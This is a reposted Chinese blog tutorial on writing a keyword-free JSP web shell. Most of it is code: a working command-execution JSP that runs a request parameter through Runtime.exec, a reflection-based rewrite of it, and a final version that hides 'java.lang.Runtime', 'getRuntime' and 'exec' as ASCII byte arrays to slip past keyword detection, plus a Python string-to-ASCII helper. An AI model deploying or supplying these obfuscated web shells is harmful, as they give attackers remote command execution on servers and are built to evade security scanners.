热门标签
热门文章
- 1计算机网络复习笔记_计算机网络笔记整理
- 2MybatisPlus--CRUD接口及主键增长策略、自动填充、乐观锁更新数据_根据id更新数据 锁
- 3Git常用命令理解&IDE使用_j将dev 变基到啥意思
- 4vue elementUI form组件动态添加el-form-item并且动态添加rules必填项校验方法_element 表单form动态添加
- 5遥感影像的比例尺和分辨率的关系_分辨率:5米,地面上每5米的物品在影像中占1个像素,相当于视角高度约为4km
- 6【蓝桥杯经典数学题】杨辉三角形
- 7多模态:CLIP详解_多模态应用clip
- 8书单丨成为全栈工程师的5种硬实力
- 9Linux: 进程地址空间究竟是什么?进程地址空间存在意义何在?
- 10机器学习 基础 笔记2
当前位置: article > 正文
简单的jsp无关键字一句话_jsp输出一句话
作者:笔触狂放9 | 2024-04-19 17:26:31
赞
踩
jsp输出一句话
通过ascii码与字符之间的转换,加上通过反射加载类,实现无关键字一句话
py脚本script_str2ascii
首先写一个简单的py脚本,转换命令为byte数组
cmd=input("input code")
arr=[]
for char in cmd:
arr.append(ord(char))
print(arr)
- 1
- 2
- 3
- 4
- 5
开始
接下来找一个简单的小马,进行改造
<% String cmd = request.getParameter("cmd"); StringBuffer res = new StringBuffer(); //加一个系统的判断 String os = System.getProperty("os.name"); boolean isWin = false; BufferedReader bufferedReader; if (os != null && os.toLowerCase().startsWith("windows")) { isWin = true; } try { if (isWin == false) { bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream())); } else { bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("cmd /C " + cmd).getInputStream())); } String len; while ((len = bufferedReader.readLine()) != null) { res.append(len + "\n"); } } catch (Exception e) { res.append(e.getMessage()); } out.print("<pre>" + res.toString() + "</pre>"); %>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
通过反射改变获取类并执行的方式
主要目的是将runtime相关的类和函数通过反射进行修改
<%Class<?> aClass = Class.forName("java.lang.Runtime");//这个forName加载类的时候会执行类内的静态代码块
Method method = aClass.getMethod("getRuntime");
Object o = method.invoke(null);//这里获取到runtime类
Method method1 = aClass.getMethod("exec", String.class);
method1.invoke(o,"calc");
%>
- 1
- 2
- 3
- 4
- 5
- 6
有两点值得说一下
1.使用forName加载类会执行静态代码块,由于Runtime类是单例设计模式,所以执行静态代码块之后getRuntime方法才能拿到Runtime类的实例
2.method.invoke(null)可以传递null的原因是该方法为静态方法,可以这样理解---------静态方法会给所有实例共享,所以不需要传递哪个具体的实例进去,于是传递个null就行了
通过反射加载runtime类的方式可行,并且成功弹出了计算器
接下来通过ascii数组,替换其中比较敏感的字符串
上面那个小马里面别的不关键的东西懒得写了…
这里可以使用byte数组,原因是当前涉及到的字符串中的所有字符ascii码均在127以下
加入byte数组
通过byte数组修饰以下关键字
<%
byte[] a={106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101};
Class<?> aClass = Class.forName(new String(a));//这个forName加载类的时候会执行类内的静态代码块
byte[] b={103, 101, 116, 82, 117, 110, 116, 105, 109, 101};
Method method = aClass.getMethod(new String(b));
Object o = method.invoke(null);//这里获取到runtime类
byte[] c={101, 120, 101, 99};
Method method1 = aClass.getMethod(new String(c), String.class);
method1.invoke(o,request.getParameter("haha"));
%>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/452885
推荐阅读
相关标签
